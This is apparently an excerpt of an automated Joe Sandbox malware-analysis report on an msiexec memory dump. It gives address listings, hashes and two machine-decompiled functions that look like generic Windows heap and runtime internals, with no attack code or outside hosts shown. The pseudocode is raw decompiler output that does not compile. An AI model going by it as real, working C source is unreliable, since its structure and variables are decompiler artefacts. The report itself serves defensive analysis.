                              0x04d1dbd2
                              0x04d1dbd7
                              0x04d1dbda
                              0x04d1dbdd
                              0x04d1dbdf
                              0x00000000
                              0x04d1dbe5
                              0x04d1dbe5
                              0x04d1dbee
                              0x04d1dbf1
                              0x04d6b541
                              0x04d6b544
                              0x00000000
                              0x04d6b546
                              0x04d6b546
                              0x00000000
                              0x04d6b546
                              0x04d1dbf7
                              0x04d1dbf7
                              0x04d1dbfd
                              0x04d1dbfd
                              0x04d1dbff
                              0x04d1dc0b
                              0x04d1dc15
                              0x04d1dc1b
                              0x04d1dc1d
                              0x04d1dc21
                              0x04d1dc21
                              0x04d1dc23
                              0x04d1dc23
                              0x04d1dc26
                              0x04d1dc29
                              0x04d1dc2b
                              0x00000000
                              0x00000000
                              0x04d1dc31
                              0x04d1dc34
                              0x04d1dc36
                              0x04d1dcbf
                              0x04d1dcbf
                              0x04d1dcc2
                              0x00000000
                              0x04d1dc3c
                              0x04d1dc41
                              0x04d1dc43
                              0x00000000
                              0x04d1dc45
                              0x04d1dc45
                              0x04d1dc47
                              0x00000000
                              0x04d1dc4d
                              0x04d1dc4d
                              0x04d1dc50
                              0x04d1dc52
                              0x04d1dc55
                              0x04d1dcfa
                              0x04d1dcfe
                              0x04d1dd08
                              0x04d1dd0a
                              0x04d1dd0c
                              0x00000000
                              0x04d1dd12
                              0x04d1dd15
                              0x04d1dd2d
                              0x04d1dd2f
                              0x04d1dd32
                              0x04d1dd35
                              0x00000000
                              0x04d1dd35
                              0x04d1dc5b
                              0x04d1dc5b
                              0x04d1dc5e
                              0x04d1dc61
                              0x04d1dc64
                              0x04d1dc67
                              0x04d1dc67
                              0x04d1dc6a
                              0x04d1dc6c
                              0x04d1dc8e
                              0x04d1dc8e
                              0x04d1dc91
                              0x04d1dc93
                              0x04d1dcce
                              0x04d1dcce
                              0x04d1dc95
                              0x04d1dc9c
                              0x04d1dc6e
                              0x04d1dc72
                              0x04d1dc75
                              0x04d1dc77
                              0x04d1dc79
                              0x04d6b551
                              0x04d6b551
                              0x00000000
                              0x04d1dc7f
                              0x04d1dc7f
                              0x04d1dc81
                              0x00000000
                              0x04d1dc83
                              0x04d1dc86
                              0x04d1dc88
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1dc88
                              0x04d1dc81
                              0x04d1dc79
                              0x04d1dc6c
                              0x04d1dc55
                              0x04d1dc47
                              0x04d1dc43
                              0x00000000
                              0x04d1dc36
                              0x04d1dc23
                              0x00000000
                              0x04d1dbff
                              0x04d1dbf1
                              0x04d1dbdf
                              0x04d1db8f
                              0x04d1db92
                              0x04d1db95
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1db95
                              0x04d1db8d
                              0x04d1db85
                              0x04d1db74
                              0x04d1dc9f
                              0x04d1dca2
                              0x04d1dcb0
                              0x04d1dcb0
                              0x04d1dad1
                              0x04d6b4e5
                              0x04d6b4c8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1d831
                              0x04d1d80d
                              0x00000000
                              0x04d1d800
                              0x04d6b47f
                              0x04d6b485
                              0x00000000
                              0x04d6b485
                              0x04d1d665
                              0x04d1d652
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f55f6f134c7b6547ea9ae5a5aa5479c521db2e454880e66934d10d475ce9398
                              • Instruction ID: 70bca79663c44ed77ff57cb2340b1679c1c57a6114e4212a29829e5c72cb6cdf
                              • Opcode Fuzzy Hash: 6f55f6f134c7b6547ea9ae5a5aa5479c521db2e454880e66934d10d475ce9398
                              • Instruction Fuzzy Hash: BDE19E30B00269AFEB34DF18D954BA9B7B2FF45308F04419ADD4A9B2A0D734BD85CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1849B Relevance: .3, Instructions: 290COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E04D1849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4ddf9c0);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4df7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04D1CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04D22280( *[fs:0x30], 0x4df8550);
						_t139 =  *0x4df7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04D3F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04D1FFB0(_t193, _t235, 0x4df8550);
								L5:
								return E04D5D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04D01C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4df7b9c; // 0x0
							_t235 = L04D24620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4df7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04D3A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04D1FFB0(_t193, _t235, 0x4df8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04D277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04D277F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4df7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4df7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04D437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4df7b9c; // 0x0
									_t214 = L04D24620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04D437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4df7b10 =  *0x4df7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4df7b04 =  *0x4df7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04D277F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04D277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4df7b08 =  *0x4df7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04D457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04D4F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04D277F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04D3A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04D277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04D496C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                              0x04d1849b
                              0x04d1849b
                              0x04d1849b
                              0x04d1849b
                              0x04d1849d
                              0x04d184a2
                              0x04d184a7
                              0x04d184b1
                              0x04d184d8
                              0x00000000
                              0x04d184b3
                              0x04d184c4
                              0x04d184c9
                              0x04d184cd
                              0x04d184cf
                              0x04d184cf
                              0x04d184d6
                              0x04d184e6
                              0x04d184e9
                              0x04d184ec
                              0x04d184ef
                              0x04d184f2
                              0x04d184f4
                              0x04d184fc
                              0x04d18501
                              0x04d18506
                              0x04d18509
                              0x04d186e0
                              0x04d186e5
                              0x04d186e8
                              0x04d186ed
                              0x04d186f0
                              0x04d186f2
                              0x04d69afd
                              0x04d69b02
                              0x04d184da
                              0x04d184df
                              0x04d184df
                              0x04d186fa
                              0x04d186fd
                              0x04d186fe
                              0x04d18701
                              0x04d18706
                              0x04d18709
                              0x04d1870b
                              0x00000000
                              0x00000000
                              0x04d18711
                              0x04d18725
                              0x04d18727
                              0x04d1872a
                              0x04d1872c
                              0x04d69af0
                              0x04d69af5
                              0x04d18732
                              0x04d18732
                              0x04d18732
                              0x04d18735
                              0x04d18737
                              0x04d18515
                              0x04d18515
                              0x04d18518
                              0x04d1851d
                              0x04d18523
                              0x04d18527
                              0x04d1852b
                              0x04d18537
                              0x04d18539
                              0x04d1853c
                              0x04d1853e
                              0x04d1868c
                              0x04d18691
                              0x04d18699
                              0x04d1869b
                              0x04d18744
                              0x04d18748
                              0x04d186a1
                              0x04d186a1
                              0x04d186a1
                              0x04d186a4
                              0x04d186a8
                              0x04d69bdf
                              0x04d69bdf
                              0x04d186ae
                              0x04d186b0
                              0x00000000
                              0x04d186b6
                              0x00000000
                              0x04d69be9
                              0x04d186b0
                              0x04d18544
                              0x04d1854a
                              0x04d1854d
                              0x04d18551
                              0x04d1876e
                              0x04d18778
                              0x04d1877b
                              0x04d18780
                              0x04d18557
                              0x04d18557
                              0x04d1855d
                              0x04d1855d
                              0x04d1856b
                              0x04d1856e
                              0x04d18570
                              0x04d18573
                              0x04d18576
                              0x04d18576
                              0x04d18579
                              0x04d1857b
                              0x00000000
                              0x00000000
                              0x04d18581
                              0x04d185a0
                              0x04d185a2
                              0x04d185a5
                              0x04d185a7
                              0x04d69b1b
                              0x04d69b1b
                              0x04d1862e
                              0x04d1862e
                              0x04d18631
                              0x04d18631
                              0x04d18634
                              0x04d18636
                              0x04d18669
                              0x04d18669
                              0x04d1866b
                              0x04d69bbf
                              0x04d69bc4
                              0x04d69bc8
                              0x04d69bce
                              0x04d69bce
                              0x04d18671
                              0x04d18671
                              0x04d18674
                              0x04d18676
                              0x04d69bae
                              0x04d69bae
                              0x04d18676
                              0x04d1867c
                              0x04d1867e
                              0x04d18688
                              0x04d18688
                              0x00000000
                              0x04d1867e
                              0x04d18638
                              0x04d18638
                              0x04d1863b
                              0x04d1863e
                              0x04d1863f
                              0x04d18642
                              0x04d18645
                              0x04d18648
                              0x04d1864d
                              0x04d69b69
                              0x04d69b6e
                              0x04d69b7b
                              0x04d69b81
                              0x04d69b85
                              0x04d69b89
                              0x04d69ba7
                              0x04d69b8b
                              0x04d69b91
                              0x04d69b9a
                              0x04d69b9f
                              0x04d69b9f
                              0x04d18788
                              0x04d1878d
                              0x04d18763
                              0x04d18763
                              0x04d18766
                              0x00000000
                              0x04d18766
                              0x04d69b70
                              0x00000000
                              0x04d69b70
                              0x04d18656
                              0x04d1865a
                              0x04d1865c
                              0x04d18752
                              0x04d18756
                              0x00000000
                              0x00000000
                              0x04d1875e
                              0x00000000
                              0x04d1875e
                              0x04d18662
                              0x04d18662
                              0x04d18662
                              0x04d18666
                              0x00000000
                              0x04d18666
                              0x04d185b7
                              0x04d185b9
                              0x04d185bc
                              0x04d185bf
                              0x04d185cc
                              0x04d185d1
                              0x04d185d4
                              0x04d185db
                              0x04d185de
                              0x04d185e0
                              0x04d69b5f
                              0x00000000
                              0x04d69b5f
                              0x04d185e6
                              0x04d185ea
                              0x04d186c3
                              0x04d186c5
                              0x04d186c8
                              0x04d186ca
                              0x04d69b16
                              0x00000000
                              0x04d69b16
                              0x04d186d6
                              0x04d185f6
                              0x04d185f6
                              0x04d185f9
                              0x04d18602
                              0x04d18606
                              0x04d1860a
                              0x04d1860b
                              0x04d1860e
                              0x04d18611
                              0x00000000
                              0x04d18611
                              0x04d185f3
                              0x00000000
                              0x04d185f3
                              0x04d18619
                              0x04d1861e
                              0x04d1861e
                              0x04d18621
                              0x04d18622
                              0x04d18623
                              0x04d18625
                              0x04d1862c
                              0x00000000
                              0x04d1873d
                              0x00000000
                              0x04d1873d
                              0x04d18737
                              0x04d1850f
                              0x04d18512
                              0x00000000
                              0x04d18512
                              0x00000000
                              0x04d184d6

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a229289157cbbd7e4d43be23131cc095205e1e2aaf684726815e05940659ad40
                              • Instruction ID: 2d28ad63b61061244609d9eb9d4376315e9958f0062c7ebfef4d8ede1eb91745
                              • Opcode Fuzzy Hash: a229289157cbbd7e4d43be23131cc095205e1e2aaf684726815e05940659ad40
                              • Instruction Fuzzy Hash: 98B16BB0F00209EFDB24EFA9D994AADBBB5FF44308F104129E806AB355D770B845DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3513A Relevance: .3, Instructions: 258COMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E04D3513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4dfd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04D4D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04D22280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04D24620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04D4F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04D1FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4dfb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04D4B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                              0x04d35142
                              0x04d3514c
                              0x04d35150
                              0x04d35157
                              0x04d35159
                              0x04d3515e
                              0x04d35165
                              0x04d35169
                              0x04d3516c
                              0x04d35172
                              0x04d35176
                              0x04d3517a
                              0x04d3517a
                              0x04d3517a
                              0x04d3517f
                              0x04d76d8b
                              0x04d76d8e
                              0x04d76d91
                              0x04d76d95
                              0x04d76d98
                              0x04d76d9c
                              0x04d76da0
                              0x04d76da3
                              0x04d76da7
                              0x04d76e26
                              0x04d76e26
                              0x04d76e2a
                              0x04d351f9
                              0x04d351f9
                              0x04d351fe
                              0x04d76e33
                              0x04d76e33
                              0x04d76e39
                              0x04d76e3d
                              0x04d76e46
                              0x04d76e50
                              0x00000000
                              0x00000000
                              0x04d76e52
                              0x04d76e53
                              0x04d76e56
                              0x04d76e5d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d76e5f
                              0x04d76e67
                              0x04d76e77
                              0x04d76e7f
                              0x04d76e80
                              0x04d76e88
                              0x04d76e90
                              0x04d76e9f
                              0x04d76ea5
                              0x04d76ea9
                              0x04d76eb1
                              0x04d76ebf
                              0x00000000
                              0x00000000
                              0x04d76ecf
                              0x04d76ed3
                              0x00000000
                              0x00000000
                              0x04d76edb
                              0x04d76ede
                              0x04d76ee1
                              0x04d76ee8
                              0x04d76eeb
                              0x04d76eed
                              0x04d76ef0
                              0x04d76ef4
                              0x04d76ef8
                              0x04d76efc
                              0x00000000
                              0x00000000
                              0x04d76f0d
                              0x04d76f11
                              0x04d76f32
                              0x04d76f37
                              0x04d76f3b
                              0x04d76f3e
                              0x04d76f41
                              0x04d76f46
                              0x00000000
                              0x00000000
                              0x04d76f4c
                              0x04d76f50
                              0x04d76f50
                              0x04d76f54
                              0x04d76f62
                              0x04d76f65
                              0x04d76f6d
                              0x04d76f7b
                              0x04d76f7b
                              0x04d76f93
                              0x04d76f98
                              0x04d76fa0
                              0x04d76fa6
                              0x04d76fb3
                              0x04d76fb6
                              0x04d76fbf
                              0x04d76fc1
                              0x04d76fd5
                              0x04d76fda
                              0x04d76fda
                              0x04d76fdd
                              0x04d76fe2
                              0x04d76fe7
                              0x04d76feb
                              0x04d76fef
                              0x04d76ff3
                              0x04d3520c
                              0x04d3520c
                              0x04d3520f
                              0x04d35215
                              0x04d35234
                              0x04d3523a
                              0x04d3523a
                              0x04d35244
                              0x04d35245
                              0x04d35246
                              0x04d35251
                              0x04d35251
                              0x04d76f13
                              0x04d76f17
                              0x04d76f17
                              0x04d76f18
                              0x04d76f1b
                              0x04d76f1f
                              0x04d76f23
                              0x00000000
                              0x04d76f28
                              0x04d35204
                              0x04d35204
                              0x04d35208
                              0x00000000
                              0x04d35208
                              0x04d35185
                              0x04d35188
                              0x04d3518a
                              0x04d3518e
                              0x04d35195
                              0x04d76db1
                              0x04d76db5
                              0x04d76db9
                              0x04d3519b
                              0x04d3519b
                              0x04d3519e
                              0x04d351a7
                              0x04d351a9
                              0x04d351a9
                              0x04d351b5
                              0x04d351b8
                              0x04d351bb
                              0x04d351be
